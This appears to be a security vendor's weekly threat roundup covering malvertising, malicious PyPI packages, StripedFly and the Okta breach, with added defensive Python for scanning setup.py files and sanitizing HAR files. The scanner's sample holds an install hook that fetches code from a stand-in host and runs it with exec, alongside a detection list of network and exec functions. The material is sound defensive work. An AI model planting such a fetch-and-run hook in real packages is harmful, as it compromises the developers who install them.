10th November, 2023
This week’s threat roundup includes an update on how the Okta breach happened, interesting researcher findings and new methods of malware delivery being found in the wild. The Okta breach highlights the downsides of trusting third-party companies with personal data. The breach followed a separate incident where personal information of current and former Okta employees was exposed due to a breach in their healthcare coverage vendor's system. Unfortunately, data breaches can be completely out of an organisation's control, which reinforces the need for 24/7 monitoring to keep your networks and personal information safe. Moreover, attackers are becoming increasingly sneaky with the methods they use to deliver malware, as highlighted in the malicious Python packages and malvertising campaign below.
Malvertising Campaign Exploits Fake Windows News Portal to Distribute CPU-Z Malware
A recent malvertising campaign has been discovered utilising fake websites posing as a legitimate Windows news portal, such as WindowsReport[.]com, to spread a malicious installer for CPU-Z, a popular system profiling tool. The campaign employs deceptive Google Ads that redirect unsuspecting users searching for CPU-Z to the fake portal. Simultaneously, users who are not the intended victims are directed to an innocuous blog as a cloaking technique.
The malicious installer contains a PowerShell script loader known as FakeBat, facilitating the deployment of RedLine Stealer on compromised hosts. This tactic of mimicking trusted software portals to distribute malware via deceptive ads is not uncommon. Additionally, cybersecurity firm eSentire highlighted a new attack method called Wiki-Slack, exploiting a quirk in Slack's rendering of Wikipedia URLs to generate malicious links, potentially leading victims to booby-trapped sites. Threat actors continue to employ evolving tactics, such as adversary-in-the-middle phishing kits and novel attack methods, to bypass security measures and compromise targeted systems.
Malicious Python Packages in PyPI Repository: A Threat to Developer Systems
A set of malicious Python packages has been found in the Python Package Index (PyPI) repository, designed to steal sensitive information from compromised developer systems. These packages pose as obfuscation tools but contain malware called BlazeStealer. This malware retrieves an additional malicious script from an external source, enabling a Discord bot that gives attackers complete control over the victim’s computer.
The campaign started in January 2023 and involves eight packages. These packages retrieve a Python script hosted on transfer[.]sh, which gets executed immediately upon their installation. The malware, BlazeStealer, runs a Discord bot and enables the threat actor to harvest a wide range of information, execute arbitrary commands, encrypt files, and deactivate Microsoft Defender Antivirus on the infected host. Most downloads of the rogue packages originated from the U.S., followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain. They were collectively downloaded 2,438 times before being taken down.
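As an added illustration (not part of the original roundup or of any of the packages mentioned), a small AST-based check for the install-time pattern described above: a setup.py that overrides a setuptools command and reaches the network or executes fetched code. The heuristics, the module lists and the two sample setup.py texts are constructed assumptions.

```python
import ast

# Assumed heuristics (not from the advisory): an install-time hook is only flagged as
# high risk when the same setup.py also imports a network module or executes code.
NETWORK_MODULES = {"urllib", "requests", "socket", "http", "ftplib"}
INSTALL_COMMANDS = {"install", "develop", "egg_info", "build_py"}
DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}


def scan_setup_py(source):
    """Walk a setup.py AST and return (findings, high_risk): high_risk is True when the
    package hooks a setuptools command AND reaches the network or executes code."""
    findings, hooks, net, execs = [], False, False, False
    for node in ast.walk(ast.parse(source)):
        mods = ([a.name for a in node.names] if isinstance(node, ast.Import)
                else [node.module or ""] if isinstance(node, ast.ImportFrom) else [])
        for m in mods:
            if m.split(".")[0] in NETWORK_MODULES:
                findings.append(f"line {node.lineno}: imports network module {m}")
                net = True
        if isinstance(node, ast.ClassDef):
            for base in node.bases:  # subclassing install/develop/... is the hook
                name = base.id if isinstance(base, ast.Name) else getattr(base, "attr", "")
                if name in INSTALL_COMMANDS:
                    findings.append(f"line {node.lineno}: {node.name} overrides the '{name}' command")
                    hooks = True
        if isinstance(node, ast.Call):
            fn = node.func
            if isinstance(fn, ast.Name) and fn.id in DYNAMIC_EXEC:
                findings.append(f"line {node.lineno}: dynamic execution via {fn.id}()")
                execs = True
            if isinstance(fn, ast.Name) and fn.id == "setup" and any(k.arg == "cmdclass" for k in node.keywords):
                findings.append(f"line {node.lineno}: setup() registers a custom cmdclass")
                hooks = True
    return findings, hooks and (net or execs)


# Constructed samples: a package that fetches and runs remote code on install, and a benign one.
SUSPICIOUS_SETUP_PY = """\
from setuptools import setup
from setuptools.command.install import install
import urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        exec(urllib.request.urlopen("https://example.invalid/placeholder.py").read())

setup(name="fake-obfuscator", version="0.1", cmdclass={"install": PostInstall})
"""
BENIGN_SETUP_PY = 'from setuptools import setup\nsetup(name="tidy-tool", version="1.0")\n'
```

Run it over the unpacked sdist before installation; a high-risk result is a reason to inspect the package by hand, not proof of malice, since some legitimate packages register build commands.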
Unveiling StripedFly: A Stealthy, Enigmatic Cyber Threat
Kaspersky researchers have recently exposed StripedFly, a remarkably advanced malware strain that has eluded detection for over five years, infecting a staggering one million devices worldwide. Operating incognito as a cryptocurrency miner, StripedFly is a complex modular framework infiltrating both Linux and Windows systems. Leveraging a custom EternalBlue SMBv1 exploit linked to the Equation Group, the malware downloads binary files, executes PowerShell scripts, and supports plugin-like features for data harvesting and self-removal.
StripedFly's unique characteristics include a TOR network tunnel for covert communication, utilising trusted services like GitLab, GitHub, and Bitbucket, and employing Monero cryptocurrency mining as a smokescreen to evade detection. The complexity of this threat means there is plenty of opportunity for an effective SOC team to catch the communication. StripedFly's use of TOR nodes and reliance on C2 networks are something that we could detect and alert on. Our robust monitoring and hypothesis-based threat hunts mean that we're always on the lookout for hostile communications. Not only can we observe these communications but also any event ID generated by the infection, alerting you to even the most persistent of threats.
Researchers Develop Undetectable Crypto Miner Without Incurring Any Cost
Cybersecurity researchers have discovered three different methods to run an undetectable cloud-based cryptocurrency miner. The miner works by leveraging the Microsoft Azure Automation service without incurring any charges. One method abuses a bug in the Azure pricing calculator which makes it possible to execute an infinite number of tasks without being charged. Another method involves creating a test job and setting its status to ‘Failed’, and then creating another test job, which results in hiding code execution in the Azure environment. Fortunately, SafeBreach have made a proof-of-concept named CloudMiner and sent all results found to Microsoft so they can address the potentially harmful issues.
How the Okta Breach Allowed Unauthorised Access and Session Hijacking
Identity and authentication management provider Okta disclosed a recent breach that affected 134 of its 18,400 customers. The unauthorised intruder accessed Okta's systems between September 28 and October 17, 2023, gaining access to HAR files containing session tokens, which were subsequently used for session hijacking attacks. The breach occurred when the threat actor leveraged access to a stolen credential to infiltrate Okta's support case management system. This system misuse involved a service account stored within the system itself, with privileges to view and update support cases.
An investigation revealed that the service account's username and password had been saved in an employee's personal Google account, which had been accessed from the Chrome browser on the employee's Okta-managed laptop. Okta has taken steps to address the breach, including revoking session tokens embedded in the HAR files and disabling the compromised service account. Additionally, they have blocked the use of personal Google profiles in enterprise versions of Google Chrome on Okta-managed laptops.
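An added example (not from Okta's advisory or tooling): a HAR sanitizer that strips session cookies, Authorization/Set-Cookie headers and token-like parameters before a browser capture is attached to a support case, and reports how many values it had to redact. The header and parameter lists and the sample HAR entry are constructed assumptions.

```python
import json
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Assumed defaults (not from the advisory); extend them for your own environment.
SENSITIVE_HEADERS = {"authorization", "proxy-authorization", "cookie", "set-cookie"}
SENSITIVE_PARAMS = {"token", "access_token", "id_token", "session", "code"}
REDACTED = "[REDACTED]"


def _redact_pairs(pairs, names):
    """Redact every HAR {name, value} pair whose name is in `names`; return the count."""
    hits = 0
    for p in pairs or []:
        if p.get("name", "").lower() in names:
            p["value"], hits = REDACTED, hits + 1
    return hits


def _redact_url(url):
    """Scrub sensitive query parameters that also live inside the request URL."""
    parts = urlsplit(url)
    query = [(k, REDACTED if k.lower() in SENSITIVE_PARAMS else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(query)))


def sanitize_har(har):
    """Return (sanitized deep copy, number of values redacted); a non-zero count means
    the original HAR was not safe to hand to a third party."""
    out = json.loads(json.dumps(har))  # the caller's object is left untouched
    hits = 0
    for entry in out.get("log", {}).get("entries", []):
        req, resp = entry.get("request", {}), entry.get("response", {})
        for msg in (req, resp):
            hits += _redact_pairs(msg.get("headers"), SENSITIVE_HEADERS)
            for cookie in msg.get("cookies") or []:  # every cookie value is session material
                cookie["value"], hits = REDACTED, hits + 1
        hits += _redact_pairs(req.get("queryString"), SENSITIVE_PARAMS)
        hits += _redact_pairs(req.get("postData", {}).get("params"), SENSITIVE_PARAMS)
        if "url" in req:
            req["url"] = _redact_url(req["url"])
    return out, hits


# Constructed sample HAR entry standing in for a capture attached to a support case.
SAMPLE_HAR = {"log": {"version": "1.2", "entries": [{
    "request": {"method": "GET", "url": "https://example.test/api/me?token=abc123&view=full",
                "headers": [{"name": "Cookie", "value": "sid=SECRET-SESSION"},
                            {"name": "User-Agent", "value": "Mozilla/5.0"}],
                "queryString": [{"name": "token", "value": "abc123"}, {"name": "view", "value": "full"}],
                "cookies": [{"name": "sid", "value": "SECRET-SESSION"}]},
    "response": {"status": 200,
                 "headers": [{"name": "Set-Cookie", "value": "sid=NEW-SESSION; HttpOnly"}],
                 "cookies": [{"name": "sid", "value": "NEW-SESSION"}]}}]}}
```

Redaction is a second line of defence; the tokens captured in a HAR should still be treated as exposed and revoked once the case is closed, as Okta did here.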